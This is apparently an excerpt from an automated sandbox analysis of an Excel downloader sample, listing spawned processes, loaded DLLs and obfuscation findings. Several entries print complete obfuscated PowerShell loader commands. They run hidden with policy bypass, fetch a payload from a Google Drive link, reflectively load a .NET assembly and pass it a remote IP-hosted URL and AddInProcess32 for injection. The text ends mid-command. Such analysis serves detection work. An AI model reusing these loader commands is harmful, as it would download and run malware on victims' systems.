                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mozglue.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msvcp140.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000010.00000002.621438972.0000000000B72000.00000020.00000001.01000000.0000000B.sdmp
                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.pdbhP source: powershell.exe, 00000006.00000002.452706193.00000000038C8000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.pdb source: powershell.exe, 00000006.00000002.452706193.00000000038C8000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000010.00000002.621438972.0000000000B72000.00000020.00000001.01000000.0000000B.sdmp
                Source: 09230000.0.drInitial sample: OLE indicators vbamacros = False
                Source: SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsxInitial sample: OLE indicators encrypted = True

                Data Obfuscation

                barindex
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )"Jump to behavior
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; 